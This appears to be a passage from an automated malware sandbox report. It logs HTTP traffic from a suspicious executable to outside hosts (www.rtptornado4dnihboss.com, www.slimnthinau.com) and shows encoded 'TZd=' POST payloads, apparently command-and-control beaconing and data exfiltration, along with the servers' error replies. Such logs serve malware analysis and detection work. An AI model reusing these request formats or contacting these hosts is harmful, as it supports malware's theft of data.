76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                                                                              Dec 4, 2023 15:27:36.409446955 CET2626OUTData Raw: 5a 6a 51 6a 65 6f 6f 57 46 6e 43 47 58 66 2b 56 2f 66 42 75 74 6a 2f 64 44 35 53 75 71 43 58 46 71 30 63 67 6b 6e 72 49 77 49 57 43 42 71 35 78 4b 42 64 65 62 6f 6e 62 2f 54 54 65 61 34 74 37 7a 72 68 65 43 5a 42 74 65 38 50 6b 58 50 55 58 51 32
                                                                                                                              Data Ascii: ZjQjeooWFnCGXf+V/fButj/dD5SuqCXFq0cgknrIwIWCBq5xKBdebonb/TTea4t7zrheCZBte8PkXPUXQ2/Ujx0msi8EUPP7j7Qm4FGw9avtmotk8vO8yr+N32aImrdAg0Y/Rxo1FrUywUh6dqxq8oisqXz3fOvOb+WQ/FVdZ9YpJIhi6FZSSFufWPzEqTCNCoJNgWnsVY9QdA3NrAUBqLsKjl5BxLEvFA5QKxmPwKByau/Ly7m
                                                                                                                              Dec 4, 2023 15:27:36.409630060 CET6484OUTData Raw: 62 30 4d 49 33 34 69 57 46 39 5a 5a 44 51 35 78 70 54 38 31 32 54 54 51 51 71 49 4f 55 63 77 38 59 43 34 4d 75 35 50 37 46 74 5a 32 33 4a 42 63 4e 38 57 7a 48 50 50 31 2b 41 52 70 77 59 39 44 6c 58 6d 6b 68 64 65 65 76 68 73 6c 41 4b 36 37 43 61
                                                                                                                              Data Ascii: b0MI34iWF9ZZDQ5xpT812TTQQqIOUcw8YC4Mu5P7FtZ23JBcN8WzHPP1+ARpwY9DlXmkhdeevhslAK67CabSJmBoEn/OMw5kMGY1yktP0Q2+GvK7JMD8jCUVFP9CMWo0MOsbsIW0tjGrofwzXXiadW3C/iKN00hX0SKUBoT7AiemSL1akPQfNU0Gl2liDz3JaNQz784EYKxtQ+jRtWYIpC4dEZYG0hLuSBNDxRHctq5CEB5VVVc
                                                                                                                              Dec 4, 2023 15:27:36.409729004 CET1340OUTData Raw: 72 2b 31 4a 63 64 47 4b 43 73 4b 74 32 65 34 5a 2f 37 58 77 35 73 72 75 34 52 41 64 74 4b 33 2f 5a 5a 51 6a 32 4f 31 46 45 58 67 48 51 39 48 69 48 67 51 66 55 35 50 53 65 74 78 79 61 30 39 4e 4a 41 75 36 78 34 62 34 68 4b 6c 31 68 66 70 53 31 71
                                                                                                                              Data Ascii: r+1JcdGKCsKt2e4Z/7Xw5sru4RAdtK3/ZZQj2O1FEXgHQ9HiHgQfU5PSetxya09NJAu6x4b4hKl1hfpS1qy2L+9pUFiLAi1WEpG7o1Hf5nWCT7Pox95buw11UNzJO1mZV8vSUI/zmZVqe8t/HFbrzeHeZ9jcXD2jGCDpQSJPbq5E1526KMZCu28JFxkXqIfaT9kbP0gUx9z2Uo6dG0bMlTPR1G0/Sxp8UO1gpPumr70BSdEl1nQ
                                                                                                                              Dec 4, 2023 15:27:36.409960985 CET2626OUTData Raw: 4a 75 57 59 70 6d 76 2b 74 44 32 7a 70 31 45 47 63 7a 46 67 35 57 4e 67 31 53 6f 79 49 47 55 46 39 46 4c 2f 42 69 37 75 58 58 6a 6b 46 55 2b 44 50 50 62 78 51 32 61 5a 71 6c 50 4b 6c 71 67 35 36 52 72 52 43 45 47 6d 36 76 38 69 67 43 44 38 51 45
                                                                                                                              Data Ascii: JuWYpmv+tD2zp1EGczFg5WNg1SoyIGUF9FL/Bi7uXXjkFU+DPPbxQ2aZqlPKlqg56RrRCEGm6v8igCD8QE9vOe7BITkTnQmzq2PgeDgAnANeUwbzwjSdJctxmn5DQthfpqzNk5omff0Gl8M78aKm0wiQ79zVwGhNXOdRbrOP3lWR3ZQmiBB6bA4DOC7gf1FNSEC96l5ThAQlw11qPGkpVhCkKLYcmBzN8Bscq1JcL0RY0Q8mzTl


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              77192.168.11.2050208198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:38.928668022 CET541OUTGET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:27:39.101649046 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:39 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              78192.168.11.205020991.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:44.287436008 CET810OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 42 67 61 7a 6b 39 77 75 67 39 79 74 31 38 39 63 6e 71 4d 78 70 5a 7a 67 5a 2b 6a 62 66 42 4d 2f 58 6c 52 6a 62 62 4a 55 46 54 62 4b 69 50 46 72 30 2f 52 67 71 62 68 55 59 4f 48 63 57 76 59 32 63 45 54 72 36 78 7a 6e 73 61 75 71 76 4c 32 66 31 75 62 61 64 35 63 6b 78 73 49 48 4d 33 61 64 75 7a 4f 62 6c 41 68 73 57 2f 6a 6c 64 41 54 74 47 47 4b 46 54 35 4d 6f 50 44 71 7a 68 35 55 47 78 4c 72 79 70 58 30 32 4e 4e 49 55 4a 73 44 5a 66 6e 35 46 55 48 30 46 66 4f 36 36 78 47 74 45 36 78 4b 49 48 51 3d 3d
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePBgazk9wug9yt189cnqMxpZzgZ+jbfBM/XlRjbbJUFTbKiPFr0/RgqbhUYOHcWvY2cETr6xznsauqvL2f1ubad5ckxsIHM3aduzOblAhsW/jldATtGGKFT5MoPDqzh5UGxLrypX02NNIUJsDZfn5FUH0FfO66xGtE6xKIHQ==
                                                                                                                              Dec 4, 2023 15:27:44.470504999 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:27:44 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              79192.168.11.205021091.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:46.989672899 CET1150OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 41 42 71 7a 6f 2b 59 75 6d 64 79 69 77 38 39 63 79 36 4d 71 70 5a 2f 67 5a 37 44 31 66 79 34 2f 5a 6e 5a 6a 59 5a 68 55 45 54 62 4b 36 66 46 71 70 50 52 37 71 62 6c 63 59 50 72 63 57 76 63 32 65 79 48 72 71 52 7a 67 30 4b 75 31 6e 72 32 61 78 75 62 4d 64 35 41 43 78 74 63 48 4d 45 4f 64 76 33 32 62 6e 6c 64 74 42 66 6a 6e 4d 51 54 75 49 6d 4b 48 54 2b 45 67 50 43 53 38 68 4c 49 47 77 72 4c 79 6f 58 30 78 61 74 49 66 52 73 43 58 58 33 38 56 53 6d 6f 36 43 2b 75 6e 32 53 59 41 33 67 37 52 5a 67 66 41 30 4d 5a 57 72 38 6a 55 68 33 54 55 66 71 43 4a 61 46 54 47 56 65 53 70 6d 70 68 2f 33 4b 4d 75 61 45 41 57 6e 69 67 52 51 69 77 68 6d 67 4d 46 59 6b 59 5a 46 36 37 67 4b 4e 75 4b 71 79 61 5a 64 35 75 4b 66 4c 42 6f 45 75 44 58 33 36 50 5a 62 79 71 32 79 4e 6e 72 46 6a 49 33 6f 30 5a 66 47 4c 46 46 6a 42 30 4c 30 47 42 47 49 76 57 70 53 6e 41 6d 5a 45 6a 75 71 72 43 4a 55 33 32 43 35 52 64 51 68 2f 2b 55 4b 77 76 30 4d 73 68 42 41 68 6b 4a 69 70 63 39 38 75 55 52 6a 47 67 6c 31 71 45 53 30 57 68 4e 38 67 6f 4a 58 37 4b 68 76 2f 55 6a 34 72 6b 4e 45 43 66 55 36 35 43 76 4a 70 52 75 6a 6a 59 38 6e 4b 54 78 38 42 44 2f 58 32 6f 76 41 36 4a 59 37 4f 49 4b 4d 78 57 73 36 36 50 4b 77 76 2b 30 70 47 71 59 6d 4c 2f 71 42 6c 72 67 58 73 6c 75 70 2b 39 7a 61 54 56 7a 51 30 2f 34 31 58 4a 31 4e 65 5a 43 6d 78 4f 6a 6c 47 73 47 66 76 35 57 66 4c 4a 46 59 4f 30 67 4b 67 5a 74 6b 4d 49 68 54 39 35 43 33 6b 50 76 61 2f 42 54 66 79 32 74 4a 74 57 54 48 68 38 69 72 44 67 38 66 67 65 37 55 2f 52 75 67 6e 43 30 6d 74 59 3d
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePABqzo+Yumdyiw89cy6MqpZ/gZ7D1fy4/ZnZjYZhUETbK6fFqpPR7qblcYPrcWvc2eyHrqRzg0Ku1nr2axubMd5ACxtcHMEOdv32bnldtBfjnMQTuImKHT+EgPCS8hLIGwrLyoX0xatIfRsCXX38VSmo6C+un2SYA3g7RZgfA0MZWr8jUh3TUfqCJaFTGVeSpmph/3KMuaEAWnigRQiwhmgMFYkYZF67gKNuKqyaZd5uKfLBoEuDX36PZbyq2yNnrFjI3o0ZfGLFFjB0L0GBGIvWpSnAmZEjuqrCJU32C5RdQh/+UKwv0MshBAhkJipc98uURjGgl1qES0WhN8goJX7Khv/Uj4rkNECfU65CvJpRujjY8nKTx8BD/X2ovA6JY7OIKMxWs66PKwv+0pGqYmL/qBlrgXslup+9zaTVzQ0/41XJ1NeZCmxOjlGsGfv5WfLJFYO0gKgZtkMIhT95C3kPva/BTfy2tJtWTHh8irDg8fge7U/RugnC0mtY=
                                                                                                                              Dec 4, 2023 15:27:47.172646046 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:27:47 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              80192.168.11.205021191.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:49.693974018 CET5198OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 41 42 71 7a 6f 2b 59 75 6d 64 79 69 77 38 39 63 79 36 4d 71 70 5a 2f 67 5a 37 44 31 66 79 67 2f 5a 53 56 6a 4b 2f 70 55 48 54 62 4b 6b 50 46 76 70 50 51 72 71 66 4a 51 59 50 57 72 57 73 30 32 65 68 2f 72 72 69 62 67 78 4b 75 30 37 37 32 59 31 75 62 2b 64 35 63 57 78 74 4a 36 4d 33 53 64 75 78 47 62 6c 6d 31 73 62 76 6a 6c 4d 51 54 79 43 47 4b 31 54 2f 55 4b 50 43 65 38 68 4a 38 47 2b 39 48 79 71 45 63 78 42 74 49 51 59 4d 43 4d 63 58 38 61 53 6d 38 75 43 2b 75 5a 32 57 41 41 33 67 62 52 59 68 66 50 30 73 5a 57 30 4d 6a 56 72 58 58 51 66 70 32 52 61 46 50 47 56 5a 4f 70 6e 4a 68 2f 31 6f 6f 74 61 6b 42 66 6a 69 67 47 55 69 39 4e 6d 68 6f 52 59 6c 4d 5a 46 4b 76 67 4c 36 36 4b 70 54 61 5a 54 35 75 55 43 37 41 75 52 65 44 4c 33 36 2f 2f 62 7a 4b 35 79 4b 66 72 46 43 6f 33 6a 77 74 59 42 72 46 48 73 68 31 4a 2b 57 39 43 49 76 47 4c 53 6e 41 32 5a 41 37 75 71 59 4b 4a 54 43 43 42 36 42 63 59 74 66 2b 42 45 51 71 37 4d 74 4e 4a 41 68 38 5a 69 75 38 39 38 4f 55 52 6d 68 38 6b 2f 61 45 4a 32 57 68 54 2f 51 6f 65 58 37 33 77 76 36 31 63 35 59 51 4e 45 79 50 55 72 5a 43 73 62 5a 52 31 71 44 59 2b 6a 4b 54 78 38 42 47 4d 58 32 6b 76 41 49 5a 59 71 74 51 4b 4a 69 75 73 38 36 50 54 77 76 2b 6c 70 47 58 6d 6d 4c 32 4a 42 6b 37 65 58 71 46 75 70 71 78 7a 5a 52 39 30 57 45 2f 39 69 48 49 39 4a 65 64 56 6d 78 53 72 6c 43 4e 78 66 64 39 57 65 4c 35 46 63 4f 30 68 4f 41 5a 71 30 63 49 4a 59 64 31 4f 33 6b 53 53 61 2b 46 35 66 77 6d 74 59 4b 76 34 44 31 49 59 35 7a 38 75 58 48 4f 72 55 39 56 38 6c 6e 32 6e 2b 49 54 4e 6d 45 4d 6a 41 4d 69 68 37 6b 59 63 45 76 72 6e 34 59 2f 77 48 30 74 4f 36 44 69 34 39 76 37 50 34 77 73 65 43 70 4c 44 64 54 66 53 35 53 65 56 76 6d 73 73 4e 36 55 48 6f 58 63 70 6d 2f 36 6d 39 45 66 56 61 30 4a 66 62 57 7a 61 72 42 66 66 77 34 78 30 31 59 72 69 4e 63 43 37 45 6b 6e 47 4c 4d 70 32 34 6b 6e 69 36 6a 45 4f 56 38 76 2f 72 4b 50 70 65 75 61 72 6c 2f 4f 6b 37 32 47 63 79 69 6e 65 53 66 6b 50 50 44 2f 6c 72 41 75 32 73 51 71 42 51 58 4d 65 44 6f 67 5a 45 54 77 6a 47 41 2f 72 6a 4d 6e 50 74 65 37 6e 67 6c 5a 6a 6f 51 62 53 55 2b 6e 49 72 62 57 72 79 78 75 5a 44 34 2b 6a 62 43 4d 68 45 59 36 4f 44 4c 73 35 2f 32 76 69 6c 66 43 39 62 4a 37 76 39 54 73 77 32 6d 6d 52 53 65 41 4f 44 65 2f 2f 48 6e 69 33 4b 4b 76 44 38 6f 49 6a 64 37 66 55 77 6a 35 62 4b 33 51 36 54 50 65 51 2b 4b 65 73 57 47 54 35 6f 79 6e 55 61 2b 42 42 76 49 6f 43 61 4a 55 44 43 4e 37 44 4c 49 62 35 53 6e 41 67 65 65 46 4f 4b 75 44 53 38 6b 6a 41 33 34 52 55 70 5a 69 55 36 65 6e 67 45 73 65 67 42 65 45 66 6b 43 7a 47 6c 38 41 38 59 4b 36 77 33 47 6b 2b 59 6a 61 7a 51 41 54 33 2b 70 32 43 36 42 77 53 77 48 57 39 58 51 41 4a 74 4a 31 78 6d 32 6b 32 4f 6b 56 36 2f 2b 47 73 2f 52 32 77 71 4d 31 5a 58 4d 76 2b 72 32 57 36 4f 5a 54 5a 58 33 6e 44 79 73 2f 48 2f 5a 42 65 56 71 67 72 48 38 78 6d 58 46 42 6c 4c 62 6c 46 6a 7a 50 48 6d 6f 57 7a 31 57 52 49 69 42 6d 59 6f 64 31 72 54 50 7a 6a 77 33 37 62 68 33 77 4e 4a 73 72 63 70 73 42 78 71 34 48 66 77 7a 62 41 56 44 66 70 55 76 78 6e 64 45 65 73 5a 68 67 48 74 35 6e 69 36 69 31 70 75 78 4a 39 30 68 31 75 59 5a 67 4c 5a 66 39 45 43 44 43 37 43 34 79 49 77 38 35 71 78 61 52 4b 36 66 50 66 69 47 4b 2b 55 4a 45 62 71 65 72 78 74 63 49 53 69 41 4e 69 5a 69 38 36 56 6a 49 42 64 57 7a 45 70 4f 68 58 5a 77 38 6c 36 76 56 7a 6e 5a 36 62 55 54 63 42 57 4b 59 43 4f 35 50 4b 76 55 6c 4b 56 39 50 59 33 6e 46 64 4f 63 44 2b 70 2f 6e 4c 56 69 51 70 79 4a 78 6e 61 68 45 46 69 78 37 4c 6f 77 73 69 4c 4e 6f 46 5a 71 61 43 4d 61 4f 46 70 57 59 4a 4f 44 72 70 53 76 79 54 61 56 4c 4f 39 32 38 57 72 65 65 6a 7a 75 2b 58 54 78 68 52 70 49 54 77 4c 4e 79 4e 2b 4a 64 52 6f 6a 64 66 6a 6e 56 30 73 56 79 49 55 6a 62 6a 31 62 34 6f 63 7a 31 74 61 7a 6a 45 44 2b 57 4f 53 4d 41 65 2b 4b 61 63 33 68 2f 69 48 76 39 52 4e 71 6e 41 58 39 56 4a 71 4d 66 58 46 77 64 68 34 57 64 6a 4c 57 34 79 67 62 5a 47 2f 57 2b 70 6b 2b 63 39 76 75 52 34 4c 61 56 7a 2b 72 6f 68 5a 31 65 42 6a 6f 38 51 56 37 69 34 78 55 52 69 66 79 68 55 77 54 46 56 6f 71 70 49 44 44 78 33 37 55 4f 50 6e 35 55 45 66 66 5a
